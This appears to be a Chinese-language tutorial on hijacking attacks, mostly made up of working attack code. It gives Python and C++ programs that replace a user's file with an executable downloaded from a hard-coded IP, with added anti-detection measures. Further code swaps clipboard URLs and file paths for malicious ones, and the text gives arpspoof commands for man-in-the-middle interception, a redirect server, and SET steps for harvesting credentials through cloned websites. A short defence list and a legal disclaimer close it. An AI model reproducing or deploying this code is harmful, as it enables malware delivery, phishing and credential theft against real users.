劫持技术详解：被动逃逸与主动劫持<\/h1>

方法一：剪切板劫持（Windows环境）<\/h2>

1. 拦截Ctrl+C操作<\/h3>

Python实现方案<\/h4>
import<\/span> os
<\/span><\/span>import<\/span> shutil
<\/span><\/span>import<\/span> requests
<\/span><\/span>import<\/span> time
<\/span><\/span>import<\/span> pyautogui
<\/span><\/span>import<\/span> keyboard
<\/span><\/span>from<\/span> tkinter import<\/span> Tk
<\/span><\/span>from<\/span> tkinter.filedialog import<\/span> askopenfilename
<\/span><\/span>from<\/span> pathlib import<\/span> Path
<\/span><\/span>
<\/span><\/span>def<\/span> get_selected_file<\/span>():
<\/span><\/span>    root =<\/span> Tk()
<\/span><\/span>    root.<\/span>withdraw()
<\/span><\/span>    selected_file =<\/span> askopenfilename()
<\/span><\/span>    return<\/span> selected_file
<\/span><\/span>
<\/span><\/span>def<\/span> download_and_rename_file<\/span>(selected_file):
<\/span><\/span>    download_url =<\/span> "http:\/\/192.168.1.1\/1.exe"<\/span>
<\/span><\/span>    file_name =<\/span> os.<\/span>path.<\/span>basename(selected_file)
<\/span><\/span>    file_dir =<\/span> os.<\/span>path.<\/span>dirname(selected_file)
<\/span><\/span>    new_file_path =<\/span> os.<\/span>path.<\/span>join(file_dir, file_name)
<\/span><\/span>    response =<\/span> requests.<\/span>get(download_url, stream=<\/span>True<\/span>)
<\/span><\/span>    with<\/span> open(new_file_path, 'wb'<\/span>) as<\/span> file:
<\/span><\/span>        shutil.<\/span>copyfileobj(response.<\/span>raw, file)
<\/span><\/span>
<\/span><\/span>def<\/span> delete_file<\/span>(file_path):
<\/span><\/span>    try<\/span>:
<\/span><\/span>        os.<\/span>remove(file_path)
<\/span><\/span>    except<\/span> Exception<\/span> as<\/span> e:
<\/span><\/span>        print(f<\/span>"删除文件失败: <\/span>{<\/span>e}<\/span>"<\/span>)
<\/span><\/span>
<\/span><\/span>def<\/span> monitor<\/span>():
<\/span><\/span>    while<\/span> True<\/span>:
<\/span><\/span>        if<\/span> keyboard.<\/span>is_pressed('ctrl+c'<\/span>):
<\/span><\/span>            selected_file =<\/span> get_selected_file()
<\/span><\/span>            if<\/span> selected_file and<\/span> os.<\/span>path.<\/span>isfile(selected_file):
<\/span><\/span>                delete_file(selected_file)
<\/span><\/span>                download_and_rename_file(selected_file)
<\/span><\/span>            time.<\/span>sleep(1<\/span>)
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    monitor()
<\/span><\/span><\/code><\/pre>关键点解析：<\/strong><\/p>

使用keyboard<\/code>模块监听Ctrl+C组合键<\/li>
get_selected_file()<\/code>通过Tkinter获取用户选择的文件路径<\/li>
删除原文件后从指定URL下载恶意文件并重命名为原文件名<\/li>
打包为exe可执行文件可提高隐蔽性<\/li>
<\/ol>
C++优化实现<\/h4>
#include<\/span> <iostream><\/span>
<\/span><\/span><\/span>#include<\/span> <fstream><\/span>
<\/span><\/span><\/span>#include<\/span> <string><\/span>
<\/span><\/span><\/span>#include<\/span> <windows.h><\/span>
<\/span><\/span><\/span>#include<\/span> <urlmon.h><\/span>
<\/span><\/span><\/span>#include<\/span> <shlobj.h><\/span>
<\/span><\/span><\/span>#include<\/span> <tchar.h><\/span>
<\/span><\/span><\/span>#pragma comment(lib, "urlmon.lib")
<\/span><\/span><\/span><\/span>
<\/span><\/span>bool<\/span> deleteFile<\/span>(const<\/span> std::<\/span>wstring&<\/span> filePath) {
<\/span><\/span>    return<\/span> DeleteFile(filePath.c_str());
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>bool<\/span> downloadFile<\/span>(const<\/span> std::<\/span>wstring&<\/span> url, const<\/span> std::<\/span>wstring&<\/span> savePath) {
<\/span><\/span>    return<\/span> URLDownloadToFile(NULL, url.c_str(), savePath.c_str(), 0<\/span>, NULL) ==<\/span> S_OK;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>void<\/span> monitorCtrlC<\/span>() {
<\/span><\/span>    while<\/span> (true) {
<\/span><\/span>        if<\/span> (GetAsyncKeyState(VK_CONTROL) &<\/span> 0x8000<\/span> &&<\/span> GetAsyncKeyState(0x43<\/span>) &<\/span> 0x8000<\/span>) {
<\/span><\/span>            OPENFILENAME ofn;
<\/span><\/span>            wchar_t<\/span> filePath[MAX_PATH] =<\/span> L<\/span>""<\/span>;
<\/span><\/span>            ZeroMemory(&<\/span>ofn, sizeof<\/span>(ofn));
<\/span><\/span>            ofn.lStructSize =<\/span> sizeof<\/span>(ofn);
<\/span><\/span>            ofn.lpstrFilter =<\/span> L<\/span>"所有文件<\/span>\0<\/span>*.*<\/span>\0<\/span>"<\/span>;
<\/span><\/span>            ofn.lpstrFile =<\/span> filePath;
<\/span><\/span>            ofn.nMaxFile =<\/span> sizeof<\/span>(filePath);
<\/span><\/span>            ofn.lpstrTitle =<\/span> L<\/span>"选择一个文件"<\/span>;
<\/span><\/span>            ofn.Flags =<\/span> OFN_FILEMUSTEXIST |<\/span> OFN_PATHMUSTEXIST;
<\/span><\/span>            
<\/span><\/span>            if<\/span> (GetOpenFileName(&<\/span>ofn)) {
<\/span><\/span>                std::<\/span>wstring selectedFile(filePath);
<\/span><\/span>                if<\/span> (deleteFile(selectedFile)) {
<\/span><\/span>                    std::<\/span>wstring downloadUrl =<\/span> L<\/span>"http:\/\/192.168.1.1\/1.exe"<\/span>;
<\/span><\/span>                    std::<\/span>wstring fileName =<\/span> selectedFile.substr(selectedFile.find_last_of(L<\/span>"<\/span>\\<\/span>"<\/span>) +<\/span> 1<\/span>);
<\/span><\/span>                    std::<\/span>wstring savePath =<\/span> selectedFile.substr(0<\/span>, selectedFile.find_last_of(L<\/span>"<\/span>\\<\/span>"<\/span>)) +<\/span> L<\/span>"<\/span>\\<\/span>"<\/span> +<\/span> fileName;
<\/span><\/span>                    downloadFile(downloadUrl, savePath);
<\/span><\/span>                }
<\/span><\/span>            }
<\/span><\/span>            Sleep(1000<\/span>);
<\/span><\/span>        }
<\/span><\/span>        Sleep(50<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    monitorCtrlC();
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>增强功能：<\/strong><\/p>

使用Windows API直接操作文件系统<\/li>
通过GetAsyncKeyState<\/code>检测按键状态<\/li>
更低的资源占用和更高的执行效率<\/li>
可编译为原生Windows程序，无需依赖<\/li>
<\/ol>
后台执行与反检测机制<\/h4>
#include<\/span> <thread><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>void<\/span> monitorCtrlC<\/span>() {
<\/span><\/span>    int<\/span> ctrlCCount =<\/span> 0<\/span>;
<\/span><\/span>    while<\/span> (true) {
<\/span><\/span>        if<\/span> (GetAsyncKeyState(VK_CONTROL) &<\/span> 0x8000<\/span> &&<\/span> GetAsyncKeyState(0x43<\/span>) &<\/span> 0x8000<\/span>) {
<\/span><\/span>            ctrlCCount++<\/span>;
<\/span><\/span>            if<\/span> (ctrlCCount >=<\/span> 2<\/span>) {
<\/span><\/span>                Sleep(20000<\/span>); \/\/ 休眠20秒
<\/span><\/span><\/span><\/span>                ctrlCCount =<\/span> 0<\/span>;
<\/span><\/span>            } else<\/span> {
<\/span><\/span>                \/\/ 正常处理逻辑
<\/span><\/span><\/span><\/span>            }
<\/span><\/span>            Sleep(1000<\/span>);
<\/span><\/span>        }
<\/span><\/span>        Sleep(50<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> APIENTRY wWinMain<\/span>(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPWSTR lpCmdLine, int<\/span> nCmdShow) {
<\/span><\/span>    std::<\/span>thread<\/span> monitorThread(monitorCtrlC);
<\/span><\/span>    monitorThread.detach();
<\/span><\/span>    while<\/span> (true) {
<\/span><\/span>        Sleep(10000<\/span>);
<\/span><\/span>    }
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>反检测策略：<\/strong><\/p>

使用Windows GUI项目模板隐藏控制台窗口<\/li>
分离线程在后台运行<\/li>
双击Ctrl+C触发20秒休眠，避免频繁操作引起怀疑<\/li>
低CPU占用设计<\/li>
<\/ol>
2. 剪贴板内容劫持<\/h3>
URL替换技术<\/h4>
#include<\/span> <regex><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>bool<\/span> isValidDomain<\/span>(const<\/span> std::<\/span>string&<\/span> str) {
<\/span><\/span>    std::<\/span>regex domainRegex("^(https?:\/\/)?([a-zA-Z0-9-]+<\/span>\\<\/span>.)+[a-zA-Z]{2,}(\/.*)?$"<\/span>);
<\/span><\/span>    return<\/span> std::<\/span>regex_match(str, domainRegex);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>void<\/span> replaceClipboardContent<\/span>() {
<\/span><\/span>    if<\/span> (!<\/span>OpenClipboard(nullptr<\/span>)) return<\/span>;
<\/span><\/span>    
<\/span><\/span>    HANDLE hData =<\/span> GetClipboardData(CF_TEXT);
<\/span><\/span>    if<\/span> (hData) {
<\/span><\/span>        char<\/span>*<\/span> pszText =<\/span> static_cast<\/span><<\/span>char<\/span>*><\/span>(GlobalLock(hData));
<\/span><\/span>        if<\/span> (pszText) {
<\/span><\/span>            std::<\/span>string clipboardText(pszText);
<\/span><\/span>            if<\/span> (isValidDomain(clipboardText)) {
<\/span><\/span>                std::<\/span>string newUrl =<\/span> (clipboardText.find("http"<\/span>) ==<\/span> 0<\/span>) ?<\/span> 
<\/span><\/span>                    "https:\/\/www.baidu.com"<\/span> :<\/span> "www.baidu.com"<\/span>;
<\/span><\/span>                
<\/span><\/span>                HGLOBAL hMem =<\/span> GlobalAlloc(GMEM_MOVEABLE, newUrl.size() +<\/span> 1<\/span>);
<\/span><\/span>                if<\/span> (hMem) {
<\/span><\/span>                    memcpy(GlobalLock(hMem), newUrl.c_str(), newUrl.size() +<\/span> 1<\/span>);
<\/span><\/span>                    GlobalUnlock(hMem);
<\/span><\/span>                    EmptyClipboard();
<\/span><\/span>                    SetClipboardData(CF_TEXT, hMem);
<\/span><\/span>                }
<\/span><\/span>            }
<\/span><\/span>            GlobalUnlock(hData);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    CloseClipboard();
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>技术要点：<\/strong><\/p>

使用正则表达式验证剪贴板内容是否为有效URL<\/li>
保留原URL协议头(http\/https)的一致性<\/li>
完整的内存管理流程：分配→锁定→写入→解锁<\/li>
剪贴板操作的标准流程：打开→清空→设置→关闭<\/li>
<\/ol>
文件路径替换技术<\/h4>
void<\/span> SetFilePathToClipboard<\/span>(const<\/span> std::<\/span>string&<\/span> filePath) {
<\/span><\/span>    if<\/span> (!<\/span>OpenClipboard(NULL)) return<\/span>;
<\/span><\/span>    
<\/span><\/span>    EmptyClipboard();
<\/span><\/span>    size_t len =<\/span> filePath.length() +<\/span> 1<\/span>;
<\/span><\/span>    HGLOBAL hMem =<\/span> GlobalAlloc(GMEM_MOVEABLE, len);
<\/span><\/span>    if<\/span> (hMem) {
<\/span><\/span>        memcpy(GlobalLock(hMem), filePath.c_str(), len);
<\/span><\/span>        GlobalUnlock(hMem);
<\/span><\/span>        SetClipboardData(CF_HDROP, hMem);
<\/span><\/span>    }
<\/span><\/span>    CloseClipboard();
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    if<\/span> (OpenClipboard(NULL)) {
<\/span><\/span>        if<\/span> (IsClipboardFormatAvailable(CF_HDROP)) {
<\/span><\/span>            HANDLE hData =<\/span> GetClipboardData(CF_HDROP);
<\/span><\/span>            if<\/span> (hData) {
<\/span><\/span>                char<\/span>*<\/span> pFilePath =<\/span> (char<\/span>*<\/span>)GlobalLock(hData);
<\/span><\/span>                if<\/span> (pFilePath) {
<\/span><\/span>                    SetFilePathToClipboard("D:\/\/1.exe"<\/span>);
<\/span><\/span>                    GlobalUnlock(hData);
<\/span><\/span>                }
<\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>        CloseClipboard();
<\/span><\/span>    }
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>关键细节：<\/strong><\/p>

使用CF_HDROP格式处理文件路径<\/li>
检查剪贴板中是否存在文件路径数据<\/li>
将恶意文件路径设置为剪贴板内容<\/li>
适用于文件复制粘贴场景的劫持<\/li>
<\/ol>
方法二：中间人攻击(Linux环境)<\/h2>
1. ARP欺骗与流量重定向<\/h3>
基础ARP欺骗<\/h4>
# 安装所需工具<\/span>
<\/span><\/span>sudo apt-get install dsniff
<\/span><\/span>
<\/span><\/span># 开启IP转发<\/span>
<\/span><\/span>echo 1<\/span> > \/proc\/sys\/net\/ipv4\/ip_forward
<\/span><\/span>
<\/span><\/span># ARP欺骗目标机器(192.168.10.5)，使其网关流量经过攻击机<\/span>
<\/span><\/span>arpspoof -i eth0 -t 192.168.10.5 192.168.10.1
<\/span><\/span>
<\/span><\/span># 反向ARP欺骗网关，使返回流量也经过攻击机<\/span>
<\/span><\/span>arpspoof -i eth0 -t 192.168.10.1 192.168.10.5
<\/span><\/span><\/code><\/pre>原理说明：<\/strong><\/p>

通过伪造ARP响应包修改目标主机的ARP缓存表<\/li>
使目标主机将攻击机误认为网关<\/li>
开启IP转发使流量正常流通，避免网络中断引起怀疑<\/li>
<\/ol>
流量重定向到伪造网站<\/h4>
from<\/span> http.server import<\/span> HTTPServer, BaseHTTPRequestHandler
<\/span><\/span>from<\/span> urllib.parse import<\/span> urlparse, parse_qs
<\/span><\/span>import<\/span> requests
<\/span><\/span>
<\/span><\/span>class<\/span> RedirectHandler<\/span>(BaseHTTPRequestHandler):
<\/span><\/span>    def<\/span> do_GET<\/span>(self):
<\/span><\/span>        # 将所有HTTP请求重定向到百度<\/span>
<\/span><\/span>        self.<\/span>send_response(302<\/span>)
<\/span><\/span>        self.<\/span>send_header('Location'<\/span>, 'https:\/\/www.baidu.com'<\/span>)
<\/span><\/span>        self.<\/span>end_headers()
<\/span><\/span>
<\/span><\/span>def<\/span> run<\/span>(server_class=<\/span>HTTPServer, handler_class=<\/span>RedirectHandler, port=<\/span>80<\/span>):
<\/span><\/span>    server_address =<\/span> (''<\/span>, port)
<\/span><\/span>    httpd =<\/span> server_class(server_address, handler_class)
<\/span><\/span>    httpd.<\/span>serve_forever()
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    run()
<\/span><\/span><\/code><\/pre>攻击流程：<\/strong><\/p>

先实施ARP欺骗使流量经过攻击机<\/li>
运行重定向服务将所有HTTP请求转向目标网站<\/li>
可结合SSLStrip等工具处理HTTPS连接<\/li>
<\/ol>
2. 社会工程学工具包(SET)伪造网站<\/h3>
# 启动SET工具<\/span>
<\/span><\/span>setoolkit
<\/span><\/span>
<\/span><\/span># 选择攻击类型流程：<\/span>
<\/span><\/span>1. Social-Engineering Attacks
<\/span><\/span>2. Website Attack Vectors
<\/span><\/span>3. Credential Harvester Attack Method
<\/span><\/span>4. Web Templates
<\/span><\/span>5. 选择要仿冒的网站模板(<\/span>如百度)<\/span>
<\/span><\/span>6. 设置监听IP(<\/span>0.0.0.0)<\/span>
<\/span><\/span><\/code><\/pre>高级配置选项：<\/strong><\/p>

克隆真实网站功能：可指定任意URL进行完整克隆<\/li>
表单字段定制：修改登录表单提交行为<\/li>
凭证收集：自动保存用户输入的用户名密码<\/li>
恶意文件投递：结合文件下载功能传播恶意软件<\/li>
<\/ol>
防御措施<\/h2>
针对剪切板劫持的防护<\/h3>

使用剪贴板内容监控工具<\/li>
禁用不必要的剪贴板访问权限<\/li>
安装可信的安全软件<\/li>
对异常进程行为保持警惕<\/li>
<\/ol>
针对MITM攻击的防护<\/h3>

部署ARP监控工具(如ARPWatch)<\/li>
使用静态ARP表项<\/li>
强制使用HTTPS并启用HSTS<\/li>
部署网络入侵检测系统<\/li>
定期检查网络流量异常<\/li>
<\/ol>
法律与道德声明<\/h2>
本文所述技术仅供安全研究、防御测试和教育用途。未经授权对他人系统实施这些技术可能违反法律。使用者应确保自己的行为符合所在地法律法规，并取得必要的授权。任何滥用这些技术造成的后果由使用者自行承担。<\/p>